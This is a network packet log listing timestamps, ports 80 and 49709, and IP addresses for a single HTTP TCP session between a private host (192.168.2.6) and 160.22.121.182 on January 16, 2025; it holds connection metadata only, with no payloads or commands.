Jan 16, 2025 13:10:04.607247114 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607279062 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607296944 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.607311010 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607383013 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.607397079 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607431889 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607464075 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607486010 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.607496977 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607530117 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607553959 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.607562065 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607598066 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.607618093 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.651442051 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.692841053 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.745177031 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918363094 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918384075 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918399096 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918411970 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918459892 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918513060 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918541908 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918565035 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918580055 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918593884 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918607950 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918613911 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918622971 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918637037 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918652058 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918653011 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918665886 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918677092 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918682098 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918697119 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918716908 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918725014 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918745995 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918750048 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918766022 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918770075 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918781042 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918797970 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918812037 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918814898 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918827057 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918840885 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918850899 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918854952 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918874979 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918886900 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918899059 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918912888 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918927908 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918934107 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918941975 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918957949 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918972015 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.918979883 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.918986082 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919001102 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919003010 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919015884 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919028044 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919032097 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919058084 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919080019 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919085979 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919095039 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919110060 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919123888 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919125080 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919137955 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919152975 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919167042 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919172049 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919182062 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919195890 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919197083 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919212103 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919226885 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919236898 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919259071 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919272900 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919287920 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919296026 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919311047 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919337034 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919351101 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919354916 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919354916 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919361115 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919369936 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919378042 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919384956 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919399977 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919408083 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919428110 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919434071 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919441938 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919450045 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919464111 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919471979 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919478893 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919481039 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919487000 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919495106 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919502020 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919518948 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919534922 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919536114 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919549942 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919558048 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919565916 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919569016 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919574022 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919581890 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919595957 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919609070 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919620037 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919624090 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919641972 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919655085 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919656038 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919671059 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919672966 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919686079 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919697046 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919699907 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919717073 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919719934 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919733047 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919739962 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919747114 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919754028 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919758081 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919760942 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919770002 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919778109 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919791937 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919800043 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919806004 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919820070 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919833899 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919847012 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919848919 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919863939 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919872046 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919879913 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919894934 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919904947 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919904947 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919912100 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919928074 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919928074 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919943094 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919950008 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919958115 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919965029 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919979095 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.919980049 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919995070 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.919998884 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.920011044 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.920020103 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.920026064 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.920038939 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.920042038 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.920058012 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.920079947 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.920116901 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.920183897 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.920289993 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949130058 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949161053 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949210882 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949217081 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949245930 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949276924 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949296951 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949326038 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949331045 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949364901 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949398041 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949418068 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949430943 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949480057 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949486971 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949508905 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949542046 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949570894 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949594021 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949626923 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949649096 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949661970 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949707985 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949712038 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949759960 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949786901 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949814081 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949819088 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949851990 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949883938 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949876070 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949932098 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.949933052 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.949979067 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950028896 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950043917 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950061083 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950093985 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950112104 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950124979 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950158119 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950177908 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950189114 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950221062 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950237989 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950256109 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950304031 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950305939 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950336933 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950371027 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950391054 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950412989 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950448036 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950469017 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950479984 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950515985 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950534105 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950547934 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950581074 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950598955 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:04.950614929 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:04.950669050 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.114773035 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.114830971 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.114878893 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.114905119 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.114933968 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.114986897 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.114986897 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115020990 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115068913 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115075111 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115098000 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115148067 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115149021 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115183115 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115214109 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115240097 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115263939 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115297079 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115334988 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115351915 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115402937 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115406036 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115437031 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115468979 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115487099 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115521908 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115554094 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115572929 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115586996 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115634918 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115636110 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115667105 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115715981 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115722895 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115766048 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115797997 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115818024 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115829945 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115864038 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115885019 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115895987 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115928888 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115950108 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.115964890 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.115997076 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116014957 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116029024 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116060972 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116080999 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116099119 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116147041 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116151094 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116204023 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116251945 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116260052 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116285086 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116313934 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116341114 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116345882 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116381884 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116400003 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116415024 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116449118 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116472006 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116480112 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116513014 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116538048 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116544962 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116579056 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116595984 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116610050 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116641998 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116661072 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116676092 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116710901 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116731882 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116743088 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116775990 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116801023 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116817951 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116864920 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116866112 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116900921 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116947889 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.116956949 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.116981983 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117013931 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117027044 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.117047071 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117079020 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117103100 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.117110968 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117144108 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117163897 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.117181063 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117213964 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117232084 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.117245913 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117279053 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117305994 CET	49709	80	192.168.2.6	160.22.121.182
Jan 16, 2025 13:10:05.117311954 CET	80	49709	160.22.121.182	192.168.2.6
Jan 16, 2025 13:10:05.117345095 CET	80	49709	160.22.121.182	192.168.2.6
